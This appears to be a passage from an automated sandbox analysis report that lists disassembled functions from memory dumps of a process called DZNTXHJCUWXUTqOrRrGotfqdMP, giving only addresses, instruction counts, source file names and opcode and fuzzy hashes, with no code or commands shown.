                                                  • Opcode ID: d2a4192eec3a06aa46179c81c07ebaec542b1be96a3c4cb3e57cece66f56b8b1
                                                  • Instruction ID: 249305a86e8f5fc7fccf0c0f2c4f834376ee5a824c9f8965450e9e427c92467f
                                                  • Opcode Fuzzy Hash: d2a4192eec3a06aa46179c81c07ebaec542b1be96a3c4cb3e57cece66f56b8b1
                                                  • Instruction Fuzzy Hash: FBD1D23092EB068FF369DB28E4A15B577A2EF46310B14857EC44E83592EE29F94987C1
                                                  Function 00007FFAACA83C5F Relevance: .4, Instructions: 379COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2524664462.00007FFAACA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaaca80000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 72f9563abda8d29125f13c5cd09def7055c8c1365474c20b623165afea96581c
                                                  • Instruction ID: 5825cf40d3057aed896c4731046c1b693339777e2dcbe3dab7c2184af198c323
                                                  • Opcode Fuzzy Hash: 72f9563abda8d29125f13c5cd09def7055c8c1365474c20b623165afea96581c
                                                  • Instruction Fuzzy Hash: 27D1B07052A645CFEB49CF18D0E05B13BB2FF46310B5485BDC84E8B68BDA38E985CB81
                                                  Function 00007FFAAC6CD4FF Relevance: .4, Instructions: 365COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4939d8fab791755b284e98a46df2c270a7f6d01624bfad6ce4a5508680002a2d
                                                  • Instruction ID: 8aac111f68667bea53cc47c46eb4124517284aa5b79da27ec46d0814ceb27195
                                                  • Opcode Fuzzy Hash: 4939d8fab791755b284e98a46df2c270a7f6d01624bfad6ce4a5508680002a2d
                                                  • Instruction Fuzzy Hash: 52D17C7051A5558BEB4ACF08C0D06B53BA1FF46310B54A6BDC85F8F68BDA38E895CB81
                                                  Function 00007FFAACA80E3A Relevance: .4, Instructions: 353COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2524664462.00007FFAACA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaaca80000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 712822d545a35bfe462a39a53d13b74c15fb473d7a51867285048ed1907c9b71
                                                  • Instruction ID: 2b9e98c4f503410daa74befd46435d7d8dcfac8027aa099fd6b307f75ec38419
                                                  • Opcode Fuzzy Hash: 712822d545a35bfe462a39a53d13b74c15fb473d7a51867285048ed1907c9b71
                                                  • Instruction Fuzzy Hash: 36411432E2E697C7F22627B8F4225FD6B915F02314F08857AD19F862E3ED0DA94853D1
                                                  Function 00007FFAACA83C7F Relevance: .3, Instructions: 338COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2524664462.00007FFAACA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaaca80000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c0823bbf26eeecc25c00c5fe4f0b6d552db2788482153b17a78575235b6f6a9d
                                                  • Instruction ID: 4999c0962af3e8454d053bc5aff0a48014a11c3ab0faca70acca62bde299ec39
                                                  • Opcode Fuzzy Hash: c0823bbf26eeecc25c00c5fe4f0b6d552db2788482153b17a78575235b6f6a9d
                                                  • Instruction Fuzzy Hash: 3AC1B27052A645CBEB09CF18D0E05B177B2FF46310B5485BDC89F8B68BDA38E949CB81
                                                  Function 00007FFAAC6CD51F Relevance: .3, Instructions: 336COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c8326183f3d6025f2f000a4dbded5dc98a779027268bb48d13153aa7aabc4ca2
                                                  • Instruction ID: 4778f6ae04e382f8810326c0803dc4a69b207a5a767f3092d27b9bf2412dc4f2
                                                  • Opcode Fuzzy Hash: c8326183f3d6025f2f000a4dbded5dc98a779027268bb48d13153aa7aabc4ca2
                                                  • Instruction Fuzzy Hash: 5AC17C7051A546CBEB0ACF18C0D06B537A1FF46310B54A5BDC85F8F68BDA38E895CB81
                                                  Function 00007FFAACA8B76F Relevance: .3, Instructions: 333COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2524664462.00007FFAACA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaaca80000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 04d60290f0d3ba21d82ced9cbaa4be417974edcc5a8779a75495bef73925a5e9
                                                  • Instruction ID: cef742a25e204a930fc052dd8043fd896d6afed7c4bad66dcc4dc26b15b750b4
                                                  • Opcode Fuzzy Hash: 04d60290f0d3ba21d82ced9cbaa4be417974edcc5a8779a75495bef73925a5e9
                                                  • Instruction Fuzzy Hash: CAC1CF31529646CBEB0DCF14E8D45B577A2FF46300B5485BDD84F8B68BEA38E949CB80
                                                  Function 00007FFAACA91B3E Relevance: .3, Instructions: 300COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2524664462.00007FFAACA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaaca80000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4b626b4bd36e875bc86d7ff2c02176a46cd2beea3f186f4877cc94ff3f61b47e
                                                  • Instruction ID: 48b36d0c0ebfa149b7b526a84e54e08fd8f247ff817e5a36d55978aa03e5082c
                                                  • Opcode Fuzzy Hash: 4b626b4bd36e875bc86d7ff2c02176a46cd2beea3f186f4877cc94ff3f61b47e
                                                  • Instruction Fuzzy Hash: 2721D832E2F553CAFE6A237878131B866535F53251F5881B7D64E8A1E2FC0EA84853D2
                                                  Function 00007FFAAC6C1D9F Relevance: .3, Instructions: 298COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c09a13801f7cd5b92fd5701cb525ea4a34b79ad346db21c93c6b1ffaab6cab7c
                                                  • Instruction ID: 1fbc7879a0e46efa04aeca78710652396d62d89540844e636921d3a57f38f1ce
                                                  • Opcode Fuzzy Hash: c09a13801f7cd5b92fd5701cb525ea4a34b79ad346db21c93c6b1ffaab6cab7c
                                                  • Instruction Fuzzy Hash: 1D21C312E0F293C6F667E7B894224F8BB905F03320F18B5B7D45E860D3DE0CA85992D2
                                                  Function 00007FFAACA80EF7 Relevance: .3, Instructions: 297COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2524664462.00007FFAACA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaaca80000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bd85af640913a7aab0d63f0bf5bab1c262e2741b9c66c77923667c8dc520ed0a
                                                  • Instruction ID: 02056286514167b272d8e9087989515c346008bd70f2b3d9dfcc077544a9ea09
                                                  • Opcode Fuzzy Hash: bd85af640913a7aab0d63f0bf5bab1c262e2741b9c66c77923667c8dc520ed0a
                                                  • Instruction Fuzzy Hash: 0C21C772D2E687CBF279637478220F95B925F13220F48C57ED24E866D3EC0CAA4853D2
                                                  Function 00007FFAACA889F2 Relevance: .3, Instructions: 286COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2524664462.00007FFAACA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaaca80000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3484464d3ec348a49a2fc67521c18aabb5cc7f7e118e302d1ca291f52342d264
                                                  • Instruction ID: 835fc014bc1caa5e30ba4e3d1711a3bc42abd5328e218b4e682030ae77d68b1f
                                                  • Opcode Fuzzy Hash: 3484464d3ec348a49a2fc67521c18aabb5cc7f7e118e302d1ca291f52342d264
                                                  • Instruction Fuzzy Hash: 7221CFE2D3F287CBF268436438210BC5AC26F53610F1885B6D04E460DAFD6CAA4D53D6
                                                  Function 00007FFAAC6C4C3A Relevance: .3, Instructions: 285COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9c472fb6641a0e9735662c62bbbb1d9460f4b7f546cc4ebaab56e9bf8b2ba21a
                                                  • Instruction ID: 7f778dca805619c123fceaea2e7e1f2844af049720b6e6d9e3e80a07f7db694f
                                                  • Opcode Fuzzy Hash: 9c472fb6641a0e9735662c62bbbb1d9460f4b7f546cc4ebaab56e9bf8b2ba21a
                                                  • Instruction Fuzzy Hash: 1DB1837051D5558BEB4ACF18C0D06B437A1FF59310B54A6BDD85FCB58BDA38E886CB80
                                                  Function 00007FFAAC6D12A7 Relevance: .3, Instructions: 282COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: cbe731b45c126359d090b078b782bd5db550c6dd771f423b51cf1ce0d5601881
                                                  • Instruction ID: 1f2d568d73535b55afc04069ebc19724809b84f3d75e1c6294652f2c8aaa4fb1
                                                  • Opcode Fuzzy Hash: cbe731b45c126359d090b078b782bd5db550c6dd771f423b51cf1ce0d5601881
                                                  • Instruction Fuzzy Hash: F421B5A2D1EA97CEF62BE76554113FC6A50AF03235F25B17BD40F861C2DC8CA48C52D1
                                                  Function 00007FFAAC6D12D4 Relevance: .3, Instructions: 282COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4c4f5abd01cd45d050f2f02401cd66eab494652e7ef7c99b37a7d35a5df20fc2
                                                  • Instruction ID: 47c745095697289d39281e94accc67b67f93b738849a200a691140769372fc2a
                                                  • Opcode Fuzzy Hash: 4c4f5abd01cd45d050f2f02401cd66eab494652e7ef7c99b37a7d35a5df20fc2
                                                  • Instruction Fuzzy Hash: AD115092D1FE87CEF22BC7A954212B859505F03235F18B1BBD54F864D29C8CA88853D2
                                                  Function 00007FFAAC6CA7B8 Relevance: .3, Instructions: 282COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 28991dae982614427c069c28c1767c8e60c1ef12a041cb13829e2fb61f872008
                                                  • Instruction ID: 69463de90099fe000b2b8a6c852cf9329e33cf454722768dddd0a803f4053b9c
                                                  • Opcode Fuzzy Hash: 28991dae982614427c069c28c1767c8e60c1ef12a041cb13829e2fb61f872008
                                                  • Instruction Fuzzy Hash: B511B442D2F683CAF26BD76558130B87A606F43720F19B27AD44FA61D39C4CA84D53D2
                                                  Function 00007FFAACA8A536 Relevance: .3, Instructions: 272COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2524664462.00007FFAACA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaaca80000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6e4103925cf312778d76c0dc1d33b5e7af95c7e1340adc1d81cd3cbc5a35c70e
                                                  • Instruction ID: e13ceba6921cf563287be0a94fef371d3c453b2da795843c8382b8a1307dc09d
                                                  • Opcode Fuzzy Hash: 6e4103925cf312778d76c0dc1d33b5e7af95c7e1340adc1d81cd3cbc5a35c70e
                                                  • Instruction Fuzzy Hash: 3181267192EA02CBF7689B28A4451B977E2EF42350B14857ED08FD3196FD28FE4687C1
                                                  Function 00007FFAAC6C3906 Relevance: .3, Instructions: 270COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 73b5f478293b08d78a3ed0a80a3c25b3f1925454e363b2450753bf53e7c3b469
                                                  • Instruction ID: 17d047d524930ab64546e537b54b553a1738cf5bebadf430767229445e1a7c06
                                                  • Opcode Fuzzy Hash: 73b5f478293b08d78a3ed0a80a3c25b3f1925454e363b2450753bf53e7c3b469
                                                  • Instruction Fuzzy Hash: EB81C36190E7828BF36BDB6C94551B67BE0EF56310B14A57ED08FC3192D929F80A8782
                                                  Function 00007FFAACA806F2 Relevance: .3, Instructions: 268COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2524664462.00007FFAACA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaaca80000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 50dfd1228db03547c52e625eb8bce5a75f2c9f6fa5b35091d880e2e72234969f
                                                  • Instruction ID: 52cd1d60ea04b9c06c334cedf04ea67d1384e0b9c91b759e4a87a4db86748fad
                                                  • Opcode Fuzzy Hash: 50dfd1228db03547c52e625eb8bce5a75f2c9f6fa5b35091d880e2e72234969f
                                                  • Instruction Fuzzy Hash: 0F812B7290E696CFF701A778E8714FA3FE1EF02218B0841B6D04ECA293FD14A5498795
                                                  Function 00007FFAAC6CC2F6 Relevance: .3, Instructions: 254COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8ad0976bc8283f65206df0a334b5a11f217b90c45fb9484378ff55d84f199db4
                                                  • Instruction ID: cfaf732e40e3e37118c9243f63ca411bd3df49985bca72280834898d63af183a
                                                  • Opcode Fuzzy Hash: 8ad0976bc8283f65206df0a334b5a11f217b90c45fb9484378ff55d84f199db4
                                                  • Instruction Fuzzy Hash: 1781E36190EA41DBF36BDF28A4455797BE0EF46310B14E57ED09EC3192DE28F80A8781
                                                  Function 00007FFAACA88679 Relevance: .3, Instructions: 253COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2524664462.00007FFAACA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaaca80000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f8be23111943cc933b44374ca49ca65bc0c4c844059d61f7cd30c1f80a5673d5
                                                  • Instruction ID: a8688de7ece16c1fda32e02276273c7703fc5c9a31ecee501cc33eb37a3b3ae6
                                                  • Opcode Fuzzy Hash: f8be23111943cc933b44374ca49ca65bc0c4c844059d61f7cd30c1f80a5673d5
                                                  • Instruction Fuzzy Hash: 3571143192E549CFFB68DB18A8565B437E2EF46310B1442B9D05EC7552FE28EA0E87C1
                                                  Function 00007FFAACA80BA9 Relevance: .3, Instructions: 253COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2524664462.00007FFAACA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaaca80000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0de93f57aa64e8c11c96b8e8a7ee8d48704c7e28354b4187ee16e97219881f20
                                                  • Instruction ID: 10160caf59fd1b72c365fde309677131134244a028b7d919481d768201184f16
                                                  • Opcode Fuzzy Hash: 0de93f57aa64e8c11c96b8e8a7ee8d48704c7e28354b4187ee16e97219881f20
                                                  • Instruction Fuzzy Hash: 937147B1A2E549CFF368DF18A8465B937C2FF46310B1442B9D05EC7562EE18EA0E87C1
                                                  Function 00007FFAACA861F9 Relevance: .3, Instructions: 252COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2524664462.00007FFAACA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaaca80000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0a6c6c58c7a38fdc52528795279bb873d5ffcc992f28419566749823eb57ac3e
                                                  • Instruction ID: 94a0b74b571bfd9e44fd8820a234e1110bee966dd7f6919893a21b157a26db50
                                                  • Opcode Fuzzy Hash: 0a6c6c58c7a38fdc52528795279bb873d5ffcc992f28419566749823eb57ac3e
                                                  • Instruction Fuzzy Hash: 3671223892E5498FF768DB18A8165B437D2FF46310F0482B9D15EC7562FE18EA0E87C1
                                                  Function 00007FFAAC6C1A41 Relevance: .2, Instructions: 249COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2af2ac8a9312e14815bbb58f72371b4da1873a8a557738614b6a432bf52a14cb
                                                  • Instruction ID: e1fdfaf416488accfd05f61bd23b26b4bc1e187d5e2a4b8b030431f4d4593d97
                                                  • Opcode Fuzzy Hash: 2af2ac8a9312e14815bbb58f72371b4da1873a8a557738614b6a432bf52a14cb
                                                  • Instruction Fuzzy Hash: E381143590D54ECFF7AADB18C8455B437D1FF6A301B14A2B9D45EC75A1EA28EC0A8BC0
                                                  Function 00007FFAAC6CA44D Relevance: .2, Instructions: 236COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0b9a975a4284757d3a37374ca0795e68396c8ab21d78a90e0ee4927c3f8f83c6
                                                  • Instruction ID: 42df0085838497667c6b22089dcd2ac3e26a468c6e56e25aa60e0b20e61e72e3
                                                  • Opcode Fuzzy Hash: 0b9a975a4284757d3a37374ca0795e68396c8ab21d78a90e0ee4927c3f8f83c6
                                                  • Instruction Fuzzy Hash: AA71F37190E5898FF76BDB28C85A4B837D0EF86310B44E2B9D05ED75A3D918E80E87C1
                                                  Function 00007FFAAC6D0AF4 Relevance: .2, Instructions: 231COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e3556ded88ea66d7b3edfbe1cbf5cf36b2d7394f1c8313b20bbb2789e14e90d2
                                                  • Instruction ID: 94671ea6e48a6725329d14766186062f72b0fd6b23a9882e0f15dfbe7f9cdc48
                                                  • Opcode Fuzzy Hash: e3556ded88ea66d7b3edfbe1cbf5cf36b2d7394f1c8313b20bbb2789e14e90d2
                                                  • Instruction Fuzzy Hash: 4971C862D4EA96DFF753E778E4615E93FA0EF02318B1891B7D04EC7293DD29A4098390
                                                  Function 00007FFAAC6CE541 Relevance: .2, Instructions: 225COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4211ccefcb104381c2971b1be207ef92b11ceb5c4a086cfd62f179c10ef4f5fe
                                                  • Instruction ID: 88d9e7998498615fe8002b518f7b1f6ddb153db43c5c9cb2d3716e82115d2f61
                                                  • Opcode Fuzzy Hash: 4211ccefcb104381c2971b1be207ef92b11ceb5c4a086cfd62f179c10ef4f5fe
                                                  • Instruction Fuzzy Hash: 2C81BE3091EB46CFE36BDB14D19457177A1FF06300B64B57DC0AE87A92CA29F84ACB91
                                                  Function 00007FFAAC6C6AE9 Relevance: .2, Instructions: 222COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 44ce871b350a82d28889326c2a7bfa91a67a1fa9f0e9d6c184bafe5d99a5dca8
                                                  • Instruction ID: 210ceca145dd8e08e60f4ca3bbf743c69b354a6ecb4d4d1c731fc800fc7c367b
                                                  • Opcode Fuzzy Hash: 44ce871b350a82d28889326c2a7bfa91a67a1fa9f0e9d6c184bafe5d99a5dca8
                                                  • Instruction Fuzzy Hash: 2851343060EB498FE75BCB2898815707BE0EF5632471852BEC08EC71A3D929F84BC785
                                                  Function 00007FFAACA8C791 Relevance: .2, Instructions: 222COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2524664462.00007FFAACA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaaca80000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6b2587527c05744d2f65608f552b315438c13ab595294eb72a185d9f8c4ce090
                                                  • Instruction ID: 254043af54f265bd99a01deea51fbe2e926b7180d366710dd82336691bcbab03
                                                  • Opcode Fuzzy Hash: 6b2587527c05744d2f65608f552b315438c13ab595294eb72a185d9f8c4ce090
                                                  • Instruction Fuzzy Hash: F781A23152AB06CFE369DB54E08557177E2FF06308B5085BDC09F87A92EA29F9468B81
                                                  Function 00007FFAAC6C68B1 Relevance: .2, Instructions: 188COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 594e244725029ebfd7eaf928f396e919a44c7b3f997401d02e5c2c0276694d55
                                                  • Instruction ID: ab065242d58da322752146d3a52c30b755e7e1346f0009f684052896c7296e3a
                                                  • Opcode Fuzzy Hash: 594e244725029ebfd7eaf928f396e919a44c7b3f997401d02e5c2c0276694d55
                                                  • Instruction Fuzzy Hash: 6F516B7490995D8FDF85EFA8D895AEDBBB1FF59300F1051AAD00DE7252CB34A881CB80
                                                  Function 00007FFAAC6C4B3F Relevance: .2, Instructions: 176COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0b30e559032f0b3f05296fc63f8b9fa30c491d3e1052915caee535a0b06a759b
                                                  • Instruction ID: 8be3f0b52e14b4fb421a64944c2ef73458e7e58d634d58d960f2c3ae7de5ad3b
                                                  • Opcode Fuzzy Hash: 0b30e559032f0b3f05296fc63f8b9fa30c491d3e1052915caee535a0b06a759b
                                                  • Instruction Fuzzy Hash: 8051AE3091E546CBEB1FCF18C4A06B17BA1FF96310B14A5B9D45E8B58BDE28E445C781
